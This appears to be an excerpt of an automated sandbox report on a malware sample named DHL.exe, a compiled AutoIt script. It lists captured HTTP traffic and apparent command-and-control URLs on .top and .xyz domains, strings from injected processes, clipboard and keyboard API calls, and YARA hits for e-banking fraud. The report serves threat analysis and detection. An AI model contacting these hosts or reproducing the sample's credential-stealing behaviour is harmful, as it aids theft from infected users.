d4 9d 56 bf bf 2e a6 0a c5 9e 4a 27 b2 9f 22 36 4d 33 36 75 d5 1e 4c 31 16 de a3 09 d7 05 f6 63 78 82 7b 8b 37 4a 07 4a e7 2e a1 66 eb 5b 1a 99 a6 1a 45 b6 94 fd 87 ce 8c d0 39 98 4f f2 02 b3 1c b3 6b c8 ae a6 79 31 cd 6f fe a0 f8 fb 05 97 50 2f b9 a1 44 16 56 2d 7c 28 97 74 9f 8a 50 dc fa 48 67 31 28 ec 83 c3 53 e8 df 61 00 b8 00 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 161uAK1{;eE)!mEj6&fJv{"xd{LxbrW~.P>-`~xGN> /pBdV%.&<=*yTj=PeipoRN 5EOqMcJe S$s+QU-Ro8n|N;##C]n3Z@]vuV.J'"6M36uL1cx{7JJ.f[E9Oky1oP/DV-|(tPHg1(Sa10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:24:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Tl%2Bdu7M6uRpNCdcrZYeTWzmoIG%2BkAUDAJbNxH%2ByXfeJlkfKqWFwp2WHroD8H5Qf85TCzREEwFwdOK%2BaYX6csR7WHIjpco3ZaH8hzz87xyDGxKmpmyrHBzoEAyOmekDaGiQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f352c86ea888ce3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1936&rtt_var=968&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=744&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b dd 75 45 28 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7e 2e e7 f0 50 3e 2d 60 f9 7e bb 78 bc 83 cb 11 e2 e3 bc bc 47 9c 95 b3 9f 4e 3e 9e 20 ce 9f 2f f5 70 a0 9c ec 42 a7 64 ac 56 e2 25 90 2e 26 05 3c b3 c0 3d d7 d1 2a fc 79 54 d8 8d 0c 07 6a c5 b6 3d ea 9a a2 50 d2 ca 65 7f 09 97 69 85 a7 f6 70 00 6f 9c 52 0b 1b 4e 20 8e c0 c7 35 c7 03 45 4f 71 4d 63 b5 4a a8 87 83 65 20 53 11 24 da 73 12 10 e7 2b d8 51 55 99 2d 81 89 f6 c8 84 da 52 c7 6f 38 04 6e 7c dc 82 8f 1b 4e 3b 23 9e 23 08 43 5d f5 6e a5 33 f1 0b 5a ae e1 40 a9 85 5d bd 76 17 0a f7 c7 a5 c5 ac 02 75 97 d4 9d 56 bf bf 2e a6 0a c5 9e 4a 27 b2 9f 22 36 4d 33 36 75 d5 1e 4c 31 16 de a3 09 37 05 f6 63 78 82 7b 8b 37 4a 07 4a e7 2e a1 66 eb 5b 1a 99 a6 1a 45 b6 94 fd 87 ce 8c d0 39 98 4f f2 02 b3 1c b3 1b c8 ae a7 79 31 bd fa 8b e2 ef 17 5c 42 bd e4 86 12 59 58 b5 f0 a1 5c d2 7d 2a 42 71 eb 23 9d c5 a0 b0 0f 0e 4f a1 7f 03 78 fe 1b 56 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 161uAK1{;uE(!mEj6&fJv{"xd{LxbrW~.P>-`~xGN> /pBdV%.&<=*yTj=PeipoRN 5EOqMcJe S$s+QU-Ro8n|N;##C]n3Z@]vuV.J'"6M36uL17cx{7JJ.f[E9Oy1\BYX\}*Bq#OxV10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:24:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIelB46BcHRgkok219krv8Mumjfw%2FpHRb6DrileRgllu81rW9XmdL9fJFcW4%2FY5yVZyhBi8Q%2Bpi0gjkCY5xP0jrKriIkEEvEHxCuBsYcM3DFr2rPtQ98yaff3Uhju%2FcroS4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f352c98ff9a43f7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1761&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:24:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WdxplgCoAyb9r%2BTdQqkLpyWc%2F85Qf1f6IcWe%2BHIEDONXFXQQIHeQYpn1an9GCeM%2BMwfMlrTZIFb2nkhkr3svcFWCbf1tNXWLbQh6ZybUyaNM4qlXx0pyKIGezLyMst9bQR0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f352cab1ed443f9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2229&min_rtt=2229&rtt_var=1114&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 73 79 76 61 34 2e 74 6f 70 2f 61 6c 37 34 2f 3f 72 50 68 3d 31 42 6a 73 65 34 61 61 75 43 6d 6f 39 37 4e 37 49 6a 4c 73 31 74 39 2f 35 44 79 74 56 2f 74 41 55 77 54 4a 55 36 75 36 45 2b 42 68 73 6f 66 36 55 48 78 64 79 32 52 71 62 79 52 67 74 62 74 37 67 4c 4b 50 67 68 55 38 6f 71 6e 72 34 6f 74 72 45 56 44 75 2f 53 55 69 51 49 2f 6f 47 7a 62 38 50 70 6e 76 6c Data Ascii: 2c9<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/SUiQI/oGzb8Ppnvl
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:25:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:25:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:25:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:25:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: wiaacmgr.exe, 00000005.00000002.2712106181.00000000053F6000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.0000000003176000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://pku-cs-cjw.top/k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ
                Source: wiaacmgr.exe, 00000005.00000002.2712106181.0000000005588000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E
                Source: eYHtcsfFquWF.exe, 00000006.00000002.2712813686.00000000050E4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.startsomething.xyz
                Source: eYHtcsfFquWF.exe, 00000006.00000002.2712813686.00000000050E4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.startsomething.xyz/9er8/
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: wiaacmgr.exe, 00000005.00000003.1897784550.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033.
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10330
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: wiaacmgr.exe, 00000005.00000002.2712106181.000000000571A000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2713669161.0000000007730000.00000004.00000800.00020000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.000000000349A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: wiaacmgr.exe, 00000005.00000002.2712106181.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.000000000362C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.juewucangku.xyz/b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2l
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A1EAFF
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A1ED6A
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A1EAFF
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00A0AA57
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A39576

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2710446513.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2712813686.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2710629488.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2700411137.0000000002850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707823352.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707521744.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1708319650.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2709918624.0000000003CB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: DHL.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: DHL.exe, 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e0f9fd8b-9
                Source: DHL.exe, 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_86dc409f-e
                Source: DHL.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d0fb5b19-4
